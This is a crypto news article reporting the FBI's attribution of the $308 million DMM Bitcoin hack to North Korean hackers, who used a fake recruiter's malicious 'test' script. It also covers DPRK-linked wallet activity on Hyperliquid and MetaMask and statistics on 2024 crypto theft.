Key Takeaways
- The FBI has linked the $308 million hack of Japanese crypto exchange DMM to North Korean hackers.
- Hackers used social engineering techniques to access DMM’s custody wallet.
- North Korean hacking groups accounted for 61% of total crypto stolen in 2024.
In May 2024, Japanese cryptocurrency exchange DMM Bitcoin Co. suffered a staggering loss of 48 billion yen (approximately $308 million) in what has now been confirmed as the largest crypto exploit of the year.
According to the FBI, the attack was orchestrated by North Korean hackers, who are notorious for such high-profile breaches.
Utilizing sophisticated social engineering tactics, the group exploited human vulnerabilities to bypass security protocols, a hallmark of their recent operations.
Social Engineering: A Tactical Edge in the DMM Hack
The FBI’s investigation revealed that North Korean hackers posed as recruiters on LinkedIn, targeting a Ginco employee with access to wallet management systems.
After initiating contact in March 2024, the hackers sent the employee a malicious Python script disguised as a pre-employment test.
Unwittingly, the victim uploaded the script to their personal GitHub page, compromising their system and exposing Ginco’s unencrypted communication channels.
This breach enabled the hackers to intercept and manipulate a legitimate transaction request in May, resulting in the theft of 4,502.9 BTC, valued at $308 million at the time.
The FBI noted that this attack aligns with a pattern of “TraderTraitor” threat activity, also tracked under aliases like Jade Sleet and UNC4899.
North Korea Hackers: Crypto’s Persistent Nemesis
North Korean hackers have become synonymous with large-scale crypto theft.
Recent on-chain analyses revealed that DPRK-linked wallets have been active on multiple platforms, raising concerns about ongoing and future exploits.
One key area of focus is Hyperliquid, a decentralized leverage trading platform.
Analysts observed that North Korean-linked wallets lost $700,000 in leveraged trades over the past few months, leading to speculation that the group is probing for vulnerabilities.
Hyperliquid’s USDC bridge, guarded by just four validators overseeing $22 billion in assets, is particularly at risk. Experts warn that compromising three validators could enable the theft of at least $2.3 billion.
Meanwhile, DPRK wallets have also been linked to suspicious activity on MetaMask, a widely used decentralized wallet platform.
Alleged hackers reportedly moved $200,000 through MetaMask and profited $1,985 in swap fees, a possible prelude to more significant exploits. “DPRK doesn’t trade. DPRK tests,” one crypto analyst cautioned.
A Year of Unprecedented Losses
In 2024, North Korean hacking groups were responsible for 61% of all stolen cryptocurrency, totaling $1.3 billion in illicit gains.
The Lazarus Group alone accounted for 20% of all known hacking incidents, shifting their focus from decentralized platforms to centralized exchanges with larger asset pools.
Following the DMM attack, India-based exchange WazirX suffered a $234 million breach in June, further highlighting this trend.
Both cases illustrate how the group has refined its tactics, leveraging social engineering as a powerful tool to bypass even the most advanced security measures.
As the year draws to a close, the crypto industry faces mounting pressure to bolster defenses and preempt emerging threats.
